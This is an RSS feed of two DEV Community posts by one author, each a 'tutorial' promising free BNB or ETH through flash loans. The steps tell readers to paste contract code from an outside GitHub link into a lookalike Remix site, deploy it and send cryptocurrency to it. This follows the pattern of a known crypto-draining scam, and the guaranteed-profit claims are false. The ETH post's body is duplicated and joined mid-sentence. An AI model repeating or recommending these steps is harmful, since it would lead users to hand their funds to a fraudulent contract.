<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Mike Mattias</title>
    <description>The latest articles on DEV Community by Mike Mattias (@likemike).</description>
    <link>https://dev.to/likemike</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1183686%2F7b9ac31e-7af4-456f-8be1-2ade363cdead.png</url>
      <title>DEV Community: Mike Mattias</title>
      <link>https://dev.to/likemike</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/likemike"/>
    <language>en</language>
    <item>
      <title>How To Get Free 10 BNB with PancakeSwap Full Tutorial 2023</title>
      <dc:creator>Mike Mattias</dc:creator>
      <pubDate>Thu, 12 Oct 2023 21:33:42 +0000</pubDate>
      <link>https://dev.to/likemike/how-to-get-free-10-bnb-with-pancakeswap-full-tutorial-2023-2971</link>
      <guid>https://dev.to/likemike/how-to-get-free-10-bnb-with-pancakeswap-full-tutorial-2023-2971</guid>
      <description>&lt;p&gt;Free Binance Smart Chain Token (BNB)? Yes, who wouldn’t want some free cash?&lt;/p&gt;

&lt;p&gt;It is possible using a special method called “FLASH LOANS”&lt;/p&gt;

&lt;p&gt;Flash loans are a type of uncollateralized lending that have become very popular in decentralized finance (DeFi). While they’ve proved popular, flash loan exploits have been used to attack vulnerable DeFi protocols.&lt;/p&gt;

&lt;p&gt;Flash Loan Explanation — &lt;a href="https://academy.binance.com/en/articles/what-are-flash-loans-in-defi"&gt;https://academy.binance.com/en/articles/what-are-flash-loans-in-defi&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So, what’s the catch? A flash loan has to be borrowed and repaid within the same blockchain transaction.&lt;/p&gt;

&lt;p&gt;WATCH FULL STEP BY STEP FLASH LOANS TUTORIAL&lt;/p&gt;

&lt;p&gt;&lt;a href="https://streamable.com/9emq0r"&gt;https://streamable.com/9emq0r&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Step By Step Tutorial for Flash Loan:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Get the Metamask Extension for your browser&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Open &lt;a href="https://remixcompiler.com"&gt;https://remixcompiler.com&lt;/a&gt; from within your browser.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Click on File Explorers and click “Create New File “.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Name the file flashloans.sol and paste the contract code link below. ► &lt;a href="https://raw.githubusercontent.com/Crypto-Ways/BNB-Arbitrage/main/Fullcode"&gt;https://raw.githubusercontent.com/Crypto-Ways/BNB-Arbitrage/main/Fullcode&lt;br&gt;
&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Click on Deploy &amp;amp; Run transactions and set “ENVIRONMENT” to Injected Web3.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Connect your MetaMask wallet.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Click on the “Solidity Compiler” and set the compiler version to 0.5.0&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Click on the Solidity Compiler and then click the blue button “Compile flashloans.sol”&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Wait for the code to compile.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Click on Deploy &amp;amp; run transactions then click on the down arrow right from the “Deploy” button&lt;br&gt;
On “_TOKENNAME” Tester&lt;br&gt;
On “_TOKENSYMBOL” TOKX&lt;br&gt;
On “_LOANAMOUNT” 2000&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Click Transact and confirm the transaction in MetaMask.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Wait for the transaction to confirm.&lt;br&gt;
Copy the address of the newly deployed contract.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Send BNB to the deployed contract to initiate the swap 0.3+ (0.3 up is better as you will get a bigger amount in each swap)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Wait for the transaction to confirm.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Now, Click “action” (red box) to execute the Flash Loan.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Confirm the transaction in MetaMask and wait for the confirmation.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;You can now check your wallet&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Note: If it doesn’t work with 0.3 BNB try to send another 0.3 BNB (0.30 is better), because fees may be different from day to day. (1.5+ BNB for each 1000 BNB you are borrowing).&lt;/p&gt;

&lt;p&gt;Avoid using very low amounts as contract may fail below 0.15 BNB. Under some very rare cases, the arbitrage might fail due to depletion of BNB in your smart contract as gas price varies from time to time.&lt;/p&gt;

&lt;p&gt;Don’t panic, all you have to do is wait a little while(5 -10 mins) and retry the transaction this time preferably with 825 loan amount and 31,560 gas limit and it should work 100% but with a smaller profit. Make sure to transfer your BNB out to another wallet when you’re done.&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>cryptocurrency</category>
      <category>blockchain</category>
      <category>beginners</category>
    </item>
    <item>
      <title>How To Get Free 4 ETH with UniSwap Full Tutorial 2023</title>
      <dc:creator>Mike Mattias</dc:creator>
      <pubDate>Thu, 12 Oct 2023 21:32:52 +0000</pubDate>
      <link>https://dev.to/likemike/how-to-get-free-4-eth-with-uniswap-full-tutorial-2023-1k7k</link>
      <guid>https://dev.to/likemike/how-to-get-free-4-eth-with-uniswap-full-tutorial-2023-1k7k</guid>
      <description>&lt;p&gt;Want to get free Ethereum? Yes, who wouldn’t want some free ETH tokens?&lt;/p&gt;

&lt;p&gt;It is possible using a special method called “FLASH LOANS”&lt;/p&gt;

&lt;p&gt;Flash loans are a type of uncollateralized lending that have become very popular in decentralized finance (DeFi). While they’ve proved popular, flash loan exploits have been used to attack vulnerable DeFi protocols.&lt;/p&gt;

&lt;p&gt;Flash Loan Explanation — &lt;a href="https://academy.binance.com/en/articles/what-are-flash-loans-in-defi"&gt;https://academy.binance.com/en/articles/what-are-flash-loans-in-defi&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So, what’s the catch? A flash loan has to be borrowed and repaid within the same blockchain transaction.&lt;/p&gt;

&lt;p&gt;WATCH FULL STEP BY STEP FLASH LOANS TUTORIAL&lt;/p&gt;

&lt;p&gt;&lt;a href="https://streamable.com/iouha4"&gt;https://streamable.com/iouha4&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Step By Step Tutorial for Flash Loan:&lt;br&gt;
 ⁃ Get the Metamask Extension for your browser&lt;/p&gt;

&lt;p&gt;⁃ Open &lt;a href="https://remixcompiler.com"&gt;https://remixcompiler.com&lt;/a&gt; from within your browser.&lt;/p&gt;

&lt;p&gt;⁃ Click on File Explorers and click “Create New File “.&lt;/p&gt;

&lt;p&gt;⁃ Name the file flashloans.sol and paste the contract code link below. ► &lt;a href="https://raw.githubusercontent.com/Crypto-Ways/ETH-Arbitrage/main/Fullcode"&gt;https://raw.githubusercontent.com/Crypto-Ways/ETH-Arbitrage/main/Fullcode&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;⁃ Click on Deploy &amp;amp; Run transactions and set “ENVIRONMENT” to Injected Web3.&lt;/p&gt;

&lt;p&gt;⁃ Connect your MetaMask wallet.&lt;/p&gt;

&lt;p&gt;⁃ Click on the “Solidity Compiler” and set the compiler version to 0.5.0&lt;/p&gt;

&lt;p&gt;⁃ Click on the Solidity Compiler and then click the blue button “Compile flashloans.sol”&lt;/p&gt;

&lt;p&gt;⁃ Wait for the code to compile.&lt;/p&gt;

&lt;p&gt;⁃ Click on Deploy &amp;amp; run transactions then click on the down arrow right from the “Deploy” button&lt;/p&gt;

&lt;p&gt;•   On “_TOKENNAME”&lt;br&gt;
 •   On “_TOKENSYMBOL”&lt;br&gt;
 •   On “_LOANAMOUNT” 1000&lt;/p&gt;

&lt;p&gt;⁃ Click Transact and confirm the transaction in MetaMask.&lt;/p&gt;

&lt;p&gt;⁃ Wait for the transaction to confirm.&lt;/p&gt;

&lt;p&gt;⁃  Copy the address of the newly deployed contract.&lt;/p&gt;

&lt;p&gt;⁃  Send ETH to the deployed contract to initiate the swap 0.05 ETH+ (0.05 ETH up is better as you will get a bigger amount in each swap)&lt;/p&gt;

&lt;p&gt;⁃ Wait for the transaction to confirm.&lt;/p&gt;

&lt;p&gt;⁃ Now, Click “action” (red box) to execute the Flash Loan.&lt;/p&gt;

&lt;p&gt;⁃ Confirm the transaction in MetaMask and wait for the confirmation.&lt;/p&gt;

&lt;p&gt;⁃  You can now check your wallet&lt;/p&gt;

&lt;p&gt;Note: If it doesn’t work with 0.05 ETH try to send another 0.05 ETH(0.1 is better), because fees may be different from day to day. (0.1+ ETH for each 1000 ETH you are borrowing).&lt;/p&gt;

&lt;p&gt;Avoid using very low amounts as contract may fail below 0.05 ETH. Under some very rare cases, the arbitrage might fail due to depletion of ETH in your smart contract as gas price varies from time to time.&lt;/p&gt;

&lt;p&gt;Don’t panic, all you have to do is wait a little while(5 -10 mins) and retry the transaction this time preferably with 825 loan amount and 31,560 gas limit and it should work 100% but with a smaller profit. Make sure to transfer your ETH out to another wallet when you’re done.Want to get free Ethereum? Yes, who wouldn’t want some free ETH tokens?&lt;/p&gt;

&lt;p&gt;It is possible using a special method called “FLASH LOANS”&lt;/p&gt;

&lt;p&gt;Flash loans are a type of uncollateralized lending that have become very popular in decentralized finance (DeFi). While they’ve proved popular, flash loan exploits have been used to attack vulnerable DeFi protocols.&lt;/p&gt;

&lt;p&gt;Flash Loan Explanation — &lt;a href="https://academy.binance.com/en/articles/what-are-flash-loans-in-defi"&gt;https://academy.binance.com/en/articles/what-are-flash-loans-in-defi&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So, what’s the catch? A flash loan has to be borrowed and repaid within the same blockchain transaction.&lt;/p&gt;

&lt;p&gt;WATCH FULL STEP BY STEP FLASH LOANS TUTORIAL&lt;/p&gt;

&lt;p&gt;&lt;a href="https://streamable.com/iouha4"&gt;https://streamable.com/iouha4&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Step By Step Tutorial for Flash Loan:&lt;br&gt;
 ⁃ Get the Metamask Extension for your browser&lt;/p&gt;

&lt;p&gt;⁃ Open &lt;a href="https://remixcompiler.com"&gt;https://remixcompiler.com&lt;/a&gt; from within your browser.&lt;/p&gt;

&lt;p&gt;⁃ Click on File Explorers and click “Create New File “.&lt;/p&gt;

&lt;p&gt;⁃ Name the file flashloans.sol and paste the contract code link below. ► &lt;a href="https://raw.githubusercontent.com/Crypto-Ways/ETH-Arbitrage/main/Fullcode"&gt;https://raw.githubusercontent.com/Crypto-Ways/ETH-Arbitrage/main/Fullcode&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;⁃ Click on Deploy &amp;amp; Run transactions and set “ENVIRONMENT” to Injected Web3.&lt;/p&gt;

&lt;p&gt;⁃ Connect your MetaMask wallet.&lt;/p&gt;

&lt;p&gt;⁃ Click on the “Solidity Compiler” and set the compiler version to 0.5.0&lt;/p&gt;

&lt;p&gt;⁃ Click on the Solidity Compiler and then click the blue button “Compile flashloans.sol”&lt;/p&gt;

&lt;p&gt;⁃ Wait for the code to compile.&lt;/p&gt;

&lt;p&gt;⁃ Click on Deploy &amp;amp; run transactions then click on the down arrow right from the “Deploy” button&lt;/p&gt;

&lt;p&gt;•   On “_TOKENNAME”&lt;br&gt;
 •   On “_TOKENSYMBOL”&lt;br&gt;
 •   On “_LOANAMOUNT” 1000&lt;/p&gt;

&lt;p&gt;⁃ Click Transact and confirm the transaction in MetaMask.&lt;/p&gt;

&lt;p&gt;⁃ Wait for the transaction to confirm.&lt;/p&gt;

&lt;p&gt;⁃  Copy the address of the newly deployed contract.&lt;/p&gt;

&lt;p&gt;⁃  Send ETH to the deployed contract to initiate the swap 0.05 ETH+ (0.05 ETH up is better as you will get a bigger amount in each swap)&lt;/p&gt;

&lt;p&gt;⁃ Wait for the transaction to confirm.&lt;/p&gt;

&lt;p&gt;⁃ Now, Click “action” (red box) to execute the Flash Loan.&lt;/p&gt;

&lt;p&gt;⁃ Confirm the transaction in MetaMask and wait for the confirmation.&lt;/p&gt;

&lt;p&gt;⁃  You can now check your wallet&lt;/p&gt;

&lt;p&gt;Note: If it doesn’t work with 0.05 ETH try to send another 0.05 ETH(0.1 is better), because fees may be different from day to day. (0.1+ ETH for each 1000 ETH you are borrowing).&lt;/p&gt;

&lt;p&gt;Avoid using very low amounts as contract may fail below 0.05 ETH. Under some very rare cases, the arbitrage might fail due to depletion of ETH in your smart contract as gas price varies from time to time.&lt;/p&gt;

&lt;p&gt;Don’t panic, all you have to do is wait a little while(5 -10 mins) and retry the transaction this time preferably with 825 loan amount and 31,560 gas limit and it should work 100% but with a smaller profit. Make sure to transfer your ETH out to another wallet when you’re done.&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>cryptocurrency</category>
      <category>blockchain</category>
      <category>programming</category>
    </item>
  </channel>
</rss>
